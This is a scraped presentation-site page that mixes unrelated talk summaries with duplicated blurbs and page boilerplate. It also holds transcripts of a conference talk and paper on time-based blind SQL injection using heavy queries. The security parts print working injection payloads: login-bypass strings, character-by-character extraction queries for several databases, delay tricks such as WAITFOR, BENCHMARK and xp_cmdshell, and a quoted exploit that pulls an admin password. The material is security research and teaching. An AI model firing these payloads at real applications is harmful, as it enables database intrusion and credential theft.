A walkthrough the main principles to reach solid NodeJS Applications with TypeScript language, Jest as Test Runner and NestJS as framework for structure.
JPA의 기본 개념에 대해 설명하고 MyBatis로 작성된 애플리케이션을 JPA로 리팩토링하는 과정을 단계별로 살펴봅니다.
목차
1. MyBatis
2. Why JPA?
3. MyBatis to JPA
- JPA 설정
- Entity
- 연관관계 설정
- Repository
- 애플리케이션에서의 사용
대상
- MyBatis를 실무에 사용하고 있으면서 JPA 도입을 고려하고 있는 백엔드 개발자
- JPA를 적용하면서 어려움을 겪었거나 JPA를 실제 적용하는 과정이 궁금한 개발자
A walkthrough the main principles to reach solid NodeJS Applications with TypeScript language, Jest as Test Runner and NestJS as framework for structure.
JPA의 기본 개념에 대해 설명하고 MyBatis로 작성된 애플리케이션을 JPA로 리팩토링하는 과정을 단계별로 살펴봅니다.
목차
1. MyBatis
2. Why JPA?
3. MyBatis to JPA
- JPA 설정
- Entity
- 연관관계 설정
- Repository
- 애플리케이션에서의 사용
대상
- MyBatis를 실무에 사용하고 있으면서 JPA 도입을 고려하고 있는 백엔드 개발자
- JPA를 적용하면서 어려움을 겪었거나 JPA를 실제 적용하는 과정이 궁금한 개발자
This is the PPT on recycler view with an explanation of basic concepts. This is a useful resource for beginners in Android Development who want to understand more about Recycler View and it's difference from List View.
A brief introduction to SQLite | What is Android SQLite? What are the advantage and disadvantage of SQLite? SQLite is an embedded relational database engine. Definitions. A relational database is a collection of data organised in tables. Installing SQLite from sources. To get the newest version of SQLite, we can install SQLite from sources. Tables used. Sources.
Injecting custom code into authentication and authorization in ASP.NET has always been tedious at best. AspNet.Identity is a new library shipping with MVC 5, built to replace both ASP.NET Membership and Simple Membership. AspNet.Identity makes it much easier to implement custom authentication and authorization without the need to rewrite core components. In this session I will go deep into the abstractions that AspNet.Identity builds atop of, and show how to take advantage of these hook points to implement a custom membership system.
This presentation was given at the November 2012 chapter meeting of the Memphis ISSA. In the presentation, I discuss various methods of exploiting common SQL Injection vulnerabilities, as well as present a specialized technique known as Time-Based Blind SQL Injection. Related to the latter, I give a scenario in which other common forms of SQL Injection would fail to produce results for a penetration tester or attacker, and show how one may overcome this situation by using the specialized technique. The scenario given, along with the sample code, is NOT a contrived example, but instead is closely based on a real-world application that I encountered as part of an assessment.
A live demonstration of the common forms of SQL Injection was also given which utilized the OWASP Broken Web Apps VM, DVWA, Burp Proxy and SQL Power Injector. To demo a real-world time-based blind injection, I created and locally hosted a new application which closely mimicked the real-world application mentioned above.
This is the PPT on recycler view with an explanation of basic concepts. This is a useful resource for beginners in Android Development who want to understand more about Recycler View and it's difference from List View.
A brief introduction to SQLite | What is Android SQLite? What are the advantage and disadvantage of SQLite? SQLite is an embedded relational database engine. Definitions. A relational database is a collection of data organised in tables. Installing SQLite from sources. To get the newest version of SQLite, we can install SQLite from sources. Tables used. Sources.
Injecting custom code into authentication and authorization in ASP.NET has always been tedious at best. AspNet.Identity is a new library shipping with MVC 5, built to replace both ASP.NET Membership and Simple Membership. AspNet.Identity makes it much easier to implement custom authentication and authorization without the need to rewrite core components. In this session I will go deep into the abstractions that AspNet.Identity builds atop of, and show how to take advantage of these hook points to implement a custom membership system.
This presentation was given at the November 2012 chapter meeting of the Memphis ISSA. In the presentation, I discuss various methods of exploiting common SQL Injection vulnerabilities, as well as present a specialized technique known as Time-Based Blind SQL Injection. Related to the latter, I give a scenario in which other common forms of SQL Injection would fail to produce results for a penetration tester or attacker, and show how one may overcome this situation by using the specialized technique. The scenario given, along with the sample code, is NOT a contrived example, but instead is closely based on a real-world application that I encountered as part of an assessment.
A live demonstration of the common forms of SQL Injection was also given which utilized the OWASP Broken Web Apps VM, DVWA, Burp Proxy and SQL Power Injector. To demo a real-world time-based blind injection, I created and locally hosted a new application which closely mimicked the real-world application mentioned above.
How "·$% developers defeat the web vulnerability scannersChema Alonso
Share Favorite
Favorited X
Download More...
Favorited! Want to add tags? Have an opinion? Make a quick comment as well. Cancel
Edit your favorites Cancel
Send to your Group / Event Select Group / Event
Add your message Cancel
Post toBlogger WordPress Twitter Facebook Deliciousmore share options .Embed For WordPress.com
Without related presentations
0 commentsPost a comment
Post a comment
..
Embed Video Subscribe to follow-up comments Unsubscribe from followup comments .
Edit your comment Cancel .Notes on slide 1
no notes for slide #1
no notes for slide #1
..Favorites, Groups & Events
more
How "·$% developers defeat the web vulnerability scanners - Presentation Transcript
1.How ?¿$·& developers defeat the most famous web vulnerability scanners …or how to recognize old friends Chema Alonso Informática64 José Parada Microsoft Ibérica
2.Agenda
1.- Introduction
2.- Inverted Queries
3.- Arithmetic Blind SQL Injection
4.- Time-Based Blind SQL Injection using Heavey Queries
5.- Conclusions
3.1.-Introduction
4.SQL Injection is still here among us
5.Web Application Security Consortium: Comparision http://projects.webappsec.org/Web-Application-Security-Statistics 12.186 sites 97.554 bugs
6.Need to Improve Automatic Scanning
Not always a manual scanning is possible
Time
Confidentiality
Money, money, money…
Need to study new ways to recognize old fashion vulnerabilities to improve automatic scanning tools.
7.2.-Inverted Queries
8.
9.Homers, how are they?
Lazy
Bad trainined
Poor Experience in security stuff
Don´t like working
Don´t like computing
Don´t like coding
Don´t like you!
10.Flanders are Left-handed
11.Right
SELECT UID
FROM USERS
WHERE NAME=‘V_NAME’
AND
PASSWORD=‘V_PASSW’;
12.Wrong?
SELECT UID
FROM USERS
WHERE ‘V_NAME’=NAME AND
‘ V_PASSW’=PASSWORD
13.Login Inverted Query
Select uid
From users where ‘v_name’=name and ‘v_pass’=password
http://www.web.com/login.php?v_name=Robert&v_pass=Kubica’ or '1'='1
Select uid
From users where ‘Robert’=name and ‘Kubica’ or ‘1’=‘1’=password
FAIL
14.Login Inverted SQL Injection an example
Select uid
From users where ‘v_name’=name and ‘v_pass’=password
http://www.web.com/login.php?v_name=Robert&v_pass=’=‘’ or ‘1’=‘1’ or ‘Kubica
Select uid
From users where ‘Robert’=name and ’’=‘’ or ‘1’=‘1’ or ‘Kubica’=password
Success
15.Blind Attacks
Attacker injects code but can´t access directly to the data.
However this injection changes the behavior of the web application.
Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data.
Blind SQL Injection
Biind Xpath Injection
Blind LDAP Injection
16.Blind SQL Injection Attacks
Attacker injects:
“ True where clauses”
“ False where clauses“
Ex:
Program.php?id=1 and 1=1
Program.php?id=1 and 1=2
Program doesn’t return any visible data from database or data in error messages.
The attacker can´t see any data extracted from the database.
17.Blind SQL Injection Attacks
Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”:
Different hashes
Different html structure
Different patterns (keywords)
Different linear ASCII sums
“ Different behavior”
By example: Response Time
18.Blind SQL Injection Attacks
If any difference exists, then:
Attacker can extract all information from database
How? Using “booleanization”
MySQL:
Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))
“ True-Answer Page” or “False-Answer Page”?
MSSQL:
Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers)
Oracle:
Program.php?id=1 and 100>(Select ASCII(Sub
Top 5 things to know about sql azure for developersIke Ellis
Databases in the cloud are a brave new world. This presentation will show up the issues with migrating your application to SQL Azure and how to address them.
A full course of what is SQL injection, how it affects us, how we can protect our website by it, some real scenarios where I discuss about the 3 main methods: union based where we get all the information by only one query, error based where we use known errors from MySQL to obtain the information from the database and blind based where we call the server to response to queries as true or false and we verify the solutions, conclusions, protection methods and I also added biography from where i read and added some more information from my personal knowledge.
PS: The images look better when the presentation is downloaded on the hard drive !
Open Source 101 2022 - MySQL Indexes and HistogramsFrederic Descamps
Nobody complains that the database is too fast. But when things slow down, the complaints come quickly. The two most popular approaches to speeding up queries are indexes and histograms. But there are so many options and types on indexes that it can get confusing. Histograms are fairly new to MySQL but they do not work for all types of data. This talk covers how indexes and histograms work and show you how to test just how effective they are so you can measure the performance of your queries.
SQL injection attack is the most common and difficult to handle attacks now days. SQL injection attack is of five types. In these paper details of SQL injection is mentioned.
La labor de gestionar la seguridad de una empresa suele ser como bailar sobre el alambre. Hay que permitir que el negocio siga funcionando, estar a la última, proteger lo ya implantado e innovar en cosas nuevas. Eso sí, de forma más eficiente cada año y con menos presupuesto. Todo ello, con el objetivo de no que no pase nada. La conclusión de esto es que al final siempre queda Long Hanging Fruit para que cualquiera se aproveche.
Configurar y utilizar Latch en MagentoChema Alonso
Tutorial realizado por Joc sobre cómo instalar y configurar Latch en el framework Magento. El plugin puede descargarse desde https://github.com/jochhop/magento-latch y tienes un vídeo descriptivo de su uso en http://www.elladodelmal.com/2015/10/configurar-y-utilizar-latch-en-magento.html
Cazando Cibercriminales con: OSINT + Cloud Computing + Big DataChema Alonso
Diapositivas de la presentación impartida por Chema Alonso durante el congreso CELAES 2015 el 15 de Octubre en Panamá. En ella se habla de cómo en Eleven Paths y Telefónica se utilizan las tecnologías Tacyt, Sinfonier y Faast para luchar contra el e-crime.
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...Chema Alonso
Technicall report created by Gartner analyst in which they explore Telefonica & Eleven Paths technologies to provide Authentication & Authorization as a Service. In it they analyse Mobile Connect, Latch, SealSign and SmartID
CritoReto 4: Buscando una aguja en un pajarChema Alonso
Los últimos meses la contrainteligencia británica ha avanzado a pasos agigantados en la localización de agentes rusos activos en suelo inglés. Los avances en criptoanálisis, del ahora ascendido Capitán Torregrosa, han permitido localizar el punto central de trabajo de los agentes rusos. Después de días vigilando “Royal China Club”, no se observa ningún movimiento, da la sensación que no es un lugar de encuentro habitual, aunque según las informaciones recopiladas los datos más sensibles de los operativos rusos se encuentran en esa localización. Por este motivo, se decide entrar en el club y copiar toda la información para analizarla. Entre las cosas más curiosas encontradas, se observa un póster en la pared con una imagen algo rara y una especie de crucigrama, así como un texto impreso en una mesa. Ningún aparato electrónico excepcional ni nada aparentemente cifrado. ¿Podrá la inteligencia británica dar por fin con los agentes rusos? El tiempo corre en su contra…
Talk delivered by Chema Alonso at RootedCON Satellite (Saturday 12th of September 2015) about how to do hacking & pentesting using dorks over Tacyt, a Big Data of Android Apps
Pentesting con PowerShell: Libro de 0xWordChema Alonso
Índice del libro "Pentesting con PowerShell" de 0xWord.com. Tienes más información y puedes adquirirlo en la siguiente URL: http://0xword.com/es/libros/69-pentesting-con-powershell.html
Recuperar dispositivos de sonido en Windows Vista y Windows 7Chema Alonso
Artículo de Windows Técnico que muestra cómo recuperar dispositivos de sonido en Windows Vista y Windows 7 cuando estos desaparecen. Más información en http://www.elladodelmal.com
Charla impartida por Chema Alonso en el congreso Internet 3.0 el 24 de Abril de 2015 en Alicante sobre cómo la gente que cree en las soluciones mágicas y gratuitas acaba siendo estafada o víctima de fraude. Todas las partes de la presentación llevan sus enlaces a los artículos correspondientes para ampliar información.
Conferencia impartida por Chema Alonso en el Primer Congreso Europeo de Ingenieros Informático realizado en Madrid el 20 de Abril de 2015 dentro de las actividades de la Semana de la Informática 2015. El vídeo de la conferencia está en la siguiente URL: https://www.youtube.com/watch?v=m6WPZmx7WoI
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...Chema Alonso
Cuarta Edición del Curso Online de Especialización en Seguridad
Informática para la Ciberdefensa
Del 4 de mayo al 4 de junio de 2015
Orientado a:
- Responsables de seguridad.
- Cuerpos y fuerzas de seguridad del Estado.
- Agencias militares.
- Ingenieros de sistemas o similar.
- Estudiantes de tecnologías de la información
Auditoría de TrueCrypt: Informe final fase IIChema Alonso
Informe con los resultados de la fase II del proceso de auditoría del software de cifrado de TrueCrypt que buscaba bugs y posibles puertas traseras en el código.
La mayoría de la gente tiene una buena concepción del hardware de Apple. En este artículo, José Antonio Rodriguez García intenta desmontar algunos mitos.
Latch en Linux (Ubuntu): El cerrojo digitalChema Alonso
Artículo de cómo fortifica Linux (Ubuntu) con Latch: El cerrojo digital. El paper ha sido escrito por Bilal Jebari http://www.bilaljebari.tk/index.php/es/blog/5-latch-en-ubuntu
Índice de contenidos del libro "Hacking con Python" escrito por Daniel Echevarri y publicado por 0xWord. Más información en: http://0xword.com/es/libros/67-hacking-con-python.html
Talk delivered by Chema Alonso in CyberCamp ES 2014 about Shuabang Botnet discoverd by Eleven Paths. http://www.slideshare.net/elevenpaths/shuabang-with-new-techniques-in-google-play
Tu iPhone es tan (in)seguro como tu WindowsChema Alonso
Charla dada por Chema Alonso en Five Talks sobre cómo funciona la seguridad de iPhone. Más información y detalles en el libro Hacking iOS {iPhone & iPad} http://0xword.com/es/libros/39-libro-hacking-dispositivos-ios-iphone-ipad.html
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024Neo4j
Neha Bajwa, Vice President of Product Marketing, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionAggregage
Join Maher Hanafi, VP of Engineering at Betterworks, in this new session where he'll share a practical framework to transform Gen AI prototypes into impactful products! He'll delve into the complexities of data collection and management, model selection and optimization, and ensuring security, scalability, and responsible use.
GridMate - End to end testing is a critical piece to ensure quality and avoid...ThomasParaiso2
End to end testing is a critical piece to ensure quality and avoid regressions. In this session, we share our journey building an E2E testing pipeline for GridMate components (LWC and Aura) using Cypress, JSForce, FakerJS…
Full-RAG: A modern architecture for hyper-personalizationZilliz
Mike Del Balso, CEO & Co-Founder at Tecton, presents "Full RAG," a novel approach to AI recommendation systems, aiming to push beyond the limitations of traditional models through a deep integration of contextual insights and real-time data, leveraging the Retrieval-Augmented Generation architecture. This talk will outline Full RAG's potential to significantly enhance personalization, address engineering challenges such as data management and model training, and introduce data enrichment with reranking as a key solution. Attendees will gain crucial insights into the importance of hyperpersonalization in AI, the capabilities of Full RAG for advanced personalization, and strategies for managing complex data integrations for deploying cutting-edge AI solutions.
Pushing the limits of ePRTC: 100ns holdover for 100 daysAdtran
At WSTS 2024, Alon Stern explored the topic of parametric holdover and explained how recent research findings can be implemented in real-world PNT networks to achieve 100 nanoseconds of accuracy for up to 100 days.
In the rapidly evolving landscape of technologies, XML continues to play a vital role in structuring, storing, and transporting data across diverse systems. The recent advancements in artificial intelligence (AI) present new methodologies for enhancing XML development workflows, introducing efficiency, automation, and intelligent capabilities. This presentation will outline the scope and perspective of utilizing AI in XML development. The potential benefits and the possible pitfalls will be highlighted, providing a balanced view of the subject.
We will explore the capabilities of AI in understanding XML markup languages and autonomously creating structured XML content. Additionally, we will examine the capacity of AI to enrich plain text with appropriate XML markup. Practical examples and methodological guidelines will be provided to elucidate how AI can be effectively prompted to interpret and generate accurate XML markup.
Further emphasis will be placed on the role of AI in developing XSLT, or schemas such as XSD and Schematron. We will address the techniques and strategies adopted to create prompts for generating code, explaining code, or refactoring the code, and the results achieved.
The discussion will extend to how AI can be used to transform XML content. In particular, the focus will be on the use of AI XPath extension functions in XSLT, Schematron, Schematron Quick Fixes, or for XML content refactoring.
The presentation aims to deliver a comprehensive overview of AI usage in XML development, providing attendees with the necessary knowledge to make informed decisions. Whether you’re at the early stages of adopting AI or considering integrating it in advanced XML development, this presentation will cover all levels of expertise.
By highlighting the potential advantages and challenges of integrating AI with XML development tools and languages, the presentation seeks to inspire thoughtful conversation around the future of XML development. We’ll not only delve into the technical aspects of AI-powered XML development but also discuss practical implications and possible future directions.
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
Climate Impact of Software Testing at Nordic Testing DaysKari Kakkonen
My slides at Nordic Testing Days 6.6.2024
Climate impact / sustainability of software testing discussed on the talk. ICT and testing must carry their part of global responsibility to help with the climat warming. We can minimize the carbon footprint but we can also have a carbon handprint, a positive impact on the climate. Quality characteristics can be added with sustainability, and then measured continuously. Test environments can be used less, and in smaller scale and on demand. Test techniques can be used in optimizing or minimizing number of tests. Test automation can be used to speed up testing.
UiPath Test Automation using UiPath Test Suite series, part 6DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 6. In this session, we will cover Test Automation with generative AI and Open AI.
UiPath Test Automation with generative AI and Open AI webinar offers an in-depth exploration of leveraging cutting-edge technologies for test automation within the UiPath platform. Attendees will delve into the integration of generative AI, a test automation solution, with Open AI advanced natural language processing capabilities.
Throughout the session, participants will discover how this synergy empowers testers to automate repetitive tasks, enhance testing accuracy, and expedite the software testing life cycle. Topics covered include the seamless integration process, practical use cases, and the benefits of harnessing AI-driven automation for UiPath testing initiatives. By attending this webinar, testers, and automation professionals can gain valuable insights into harnessing the power of AI to optimize their test automation workflows within the UiPath ecosystem, ultimately driving efficiency and quality in software development processes.
What will you get from this session?
1. Insights into integrating generative AI.
2. Understanding how this integration enhances test automation within the UiPath platform
3. Practical demonstrations
4. Exploration of real-world use cases illustrating the benefits of AI-driven test automation for UiPath
Topics covered:
What is generative AI
Test Automation with generative AI and Open AI.
UiPath integration with generative AI
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Communications Mining Series - Zero to Hero - Session 1DianaGray10
This session provides introduction to UiPath Communication Mining, importance and platform overview. You will acquire a good understand of the phases in Communication Mining as we go over the platform with you. Topics covered:
• Communication Mining Overview
• Why is it important?
• How can it help today’s business and the benefits
• Phases in Communication Mining
• Demo on Platform overview
• Q/A
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...Neo4j
Leonard Jayamohan, Partner & Generative AI Lead, Deloitte
This keynote will reveal how Deloitte leverages Neo4j’s graph power for groundbreaking digital twin solutions, achieving a staggering 100x performance boost. Discover the essential role knowledge graphs play in successful generative AI implementations. Plus, get an exclusive look at an innovative Neo4j + Generative AI solution Deloitte is developing in-house.
Essentials of Automations: The Art of Triggers and Actions in FMESafe Software
In this second installment of our Essentials of Automations webinar series, we’ll explore the landscape of triggers and actions, guiding you through the nuances of authoring and adapting workspaces for seamless automations. Gain an understanding of the full spectrum of triggers and actions available in FME, empowering you to enhance your workspaces for efficient automation.
We’ll kick things off by showcasing the most commonly used event-based triggers, introducing you to various automation workflows like manual triggers, schedules, directory watchers, and more. Plus, see how these elements play out in real scenarios.
Whether you’re tweaking your current setup or building from the ground up, this session will arm you with the tools and insights needed to transform your FME usage into a powerhouse of productivity. Join us to discover effective strategies that simplify complex processes, enhancing your productivity and transforming your data management practices with FME. Let’s turn complexity into clarity and make your workspaces work wonders!
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
Dr. Sean Tan, Head of Data Science, Changi Airport Group
Discover how Changi Airport Group (CAG) leverages graph technologies and generative AI to revolutionize their search capabilities. This session delves into the unique search needs of CAG’s diverse passengers and customers, showcasing how graph data structures enhance the accuracy and relevance of AI-generated search results, mitigating the risk of “hallucinations” and improving the overall customer journey.
Time-Based Blind SQL Injection Using Heavy Queries
1. Time-Based Blind SQL
Injection using Heavy
Queries
A practical approach for MS SQL
Server, MS Access, Oracle and MySQL
databases
and Marathon Tool
Authors: Chema Alonso, Daniel Kachakil, Rodolfo Bordón, Antonio Guzmán y Marta Beltrán
Speakers: Chema Alonso & José Parada Gimeno
Abstract: This document describes how attackers could take advantage of SQL Injection vulnerabilities
taking advantage of time-based blind SQL injection using heavy queries. The goal is to stress the
importance of establishing secure development best practices for Web applications and not only to entrust
the site security to the perimeter defenses. This article shows exploitation examples for some versions of
Microsoft SQL Server, Oracle DB Engine, MySQL and Microsoft Access database engines, nevertheless
the presented technique is applicable to any other database product in the market. This work is
accompanied by a tool to prove the technique.
2. Time-Based Blind SQL Injection using heavy queries & Marathon Tool
Page 1 of 12
Index
Section Page
1. INTRODUCTION 02
2.“TRICKS” FOR TIME DELAYS4 03
2.1 Microsoft SQL Server 2000/2005 04
2.2 Microsoft Access 2000 06
2.3 MySQL 5 07
2.4 Oracle 08
3 . HEAVY QUERIES 08
4. MARATHON TOOL 09
4.1 Configuration Section 09
4.2 Database Schema 11
4.3 Debug Log Section 11
References 12
Authors 12
3. Time-Based Blind SQL Injection using heavy queries & Marathon Tool
Page 2 of 12
1. INTRODUCTION
The first reference to “blind attacks” using SQL queries was introduced by Chris Anley in June
2002 ([1]). In this paper the author calls attention to the possibility of creating attacks to avoid
the database error processing by searching a binary behavior in system’s responses. This work
proposes a blind security analysis in which the analyzer had to infer how to extract the
information building up SQL queries from which the only possible responses will be true or
false. Furthermore, different methods to determine when to consider a system response as true
or false are proposed. Among them he proposes to construct a criterion time-based.
Anley gives some examples of blind SQL injection techniques where the information is
extracted from the database using a vulnerable parameter. Using this parameter code is
injected to generate a delay in response time when the condition is true:
<<······ if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor delay '0:0:5'
…it is possible to determine whether a given bit in a string is '1' or ’0’.That is, the above query will
pause for five seconds if bit '@bit' of byte '@byte' in string '@s' is '1.'
For example, the following query:
declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s, 1, 1)) & ( power(2, 0))) >
0 waitfor delay '0:0:5'
will pause for five seconds if the first bit of the first byte of the name of the current database is 1
After this first reference, blind SQL injection techniques continued to be studied with most of
techniques generating error messages from the attack system, because of the simplicity, quick
execution, and extension of showing an error message versus delaying the database. In [2] the
authors analyze different ways to identify a vulnerable parameter on a SQL Injection system,
even when the information processed and returned by the system is not visible.
At the 2004 BlackHat Conference ([3]) alternative methods to automate the exploitation of a
Blind SQL Injection vulnerable parameter are proposed, using different custom tools. Three
different solutions for the automation are proposed: to search for keywords on positive and
negative results, to use MD5 signatures to discriminate positive and negative results and to
employ textual difference engine. It is also introduced SQueal, an automatic tool to extract
information through Blind SQL Injection, which evolved later to another tool called Absinthe
([4]).
In [5] time-based inference techniques are discussed, and the author proposed other ways to
obtain time delays using calls to stored procedures, such as xp_cmdshell on MS SQL Server to
do a ping.
xp_cmdshell ‘ping –n 10 127.0.0.1’ application paused 10 seconds.
Time-based techniques can be extended to any action performed by a stored procedure
capable of generating a time delay or any other measurable action.
In [6] SQL Injection tricks for MySQL are included with some examples based on benchmark
functions that can generate time delays. For example:
SELECT BENCHMARK(10000000,ENCODE('abc','123')); [around 5 sec]
SELECT BENCHMARK(1000000,MD5(CHAR(116))) [ around 7 sec]
Example: SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM
login
An exploit ([7]), published in June 2007, shows how this technique could be used to attack a
game server called Solar Empire. This exploit is a perfect example of how a Time Based Blind
SQL Injection attack can be done. The next piece of code shows the injected code for delay the
database server answer:
4. Time-Based Blind SQL Injection using heavy queries & Marathon Tool
Page 3 of 12
¡$sql="F***You'),(1,2,3,4,5,(SELECT IF (ASCII (SUBSTRING(se_games.admin_pw,
".$j.", 1)) =".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM se_games))/*";
Figure 1: Exploit for Solar Empire. Blind SQL Injection in blue. Time delay in red.
As the studies of the time-based Blind SQL Injection techniques are moving forward, some new
tools have been created, such as SQL Ninja ([8]), which uses the Wait-for method for Microsoft
SQL Server engines, or SQL PowerInjector ([9]), which implements the Wait-for method for
Microsoft SQL Server Database engines, Benchmark functions for MySQL engines, and an
extension of the Wait-for method for Oracle engines, using calls to DBMS_LOCK methods.
2. “TRICKS” FOR TIME DELAYS
Taking into consideration the methods described above, it can be seen that having access to
stored procedures for Microsoft SQL Server and Oracle is needed to be able to generate time
delays using calls to Wait-for methods and DBMS_LOCK. However, this is not necessary on
MySQL engines, because in this case a mathematic function is used to generate the time delay.
Some Intrusion Detection Systems (IDS) and Firewalls applications have the ability to block the
URLs that use Benchmark functions.
The question now is, if the use of stored procedures and Benchmark functions is cancelled, may
it be generated a time-based blind SQL injection method?. The answer is yes. Blind SQL
injection exploits can only be avoided by using the right programming technique. The program
must make sure all the code is going to execute is not an attack, or, in Michael Howard’s words:
“All input is evil until it proven otherwise.”
5. Time-Based Blind SQL Injection using heavy queries & Marathon Tool
Page 4 of 12
A simple way to generate time-delays is to take advantage of one of the biggest database
problems that have made necessary the development of performance-tuning techniques: heavy
queries. The only thing needed is to generate a time-delay is to access a table with some
registers and to build a “good big query” to force the engine to work. In other words, to build a
query ignoring what the performance best practices recommend.
In this example we have a URL with a SQL Injection vulnerability that can be exploited only by a
time-based blind SQL injection. This means that there isn’t any error message produced by the
system (figure 2), and we always obtain the same response (sometimes because a query is
right and sometimes because the programmer has coded a default response even when an
error occurs).
Figure 1. Error Condition. The programmer returns a default value → Result 1
2.1 Microsoft SQL Server 2000/2005
In Microsoft SQL Server 2000 and Microsoft SQL Server 2005 engines a heavy query can be
done using some tables from the dictionary which the user has been granted access. In this
example we do a heavy query accessing sysusers table.
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM
sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5,
sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>0 and 300>(select top 1
ascii(substring(name,1,1)) from sysusers)
It can be seen in figure 3, the query starts at 23:49:11 and ends at 23:49:25 then it lasts 14
seconds. This time-delay is caused by the second condition in the “where” clause because is a
heavy query. This query in the where clause only is executed if the third one is also True then,
in this case, “300>(select top 1 ascii(substring(name,1,1)) from sysusers)” is TRUE. It’s actually
known that the ASCII value of the first username’s letter in the sysusers table is lower than 300.
Figure 3: Positive result. The response time is 14 seconds.
6. Time-Based Blind SQL Injection using heavy queries & Marathon Tool
Page 5 of 12
As we can see in figure 4, the query starts at 00:00:28 and ends at 00:00:29, it means the query
lasts one second. This time-delay is because the third condition in the where clause It is
FALSE, so the database hadn´t to evaluate the second condition, then “0>(select top 1
ascii(substring(name,1,1)) from sysusers)” is FALSE. We actually know than the ASCII value of
the first username’s letter in the sysusers table is greater than 0.
Figure 4: egative result. The response time is 1 second.
With these two queries we can access all the information stored in the database measuring the
time-delays. The main idea is that when the third condition in the query is FALSE, the database
engine stops processing the second condition because with one FALSE value in a query with
“and” operators, the result will be FALSE. Therefore, the database engine does not have to
process the heavy query (second condition). So, if we want to know the exact value of the
username stored, we have to move the index and measure the response time with following
queries:
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM
sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5,
sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1
ascii(substring(name,1,1)) from sysusers) 14 s TRUE
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM
sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5,
sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 0>(select top 1
ascii(substring(name,1,1)) from sysusers) 1 s FALSE
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM
sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5,
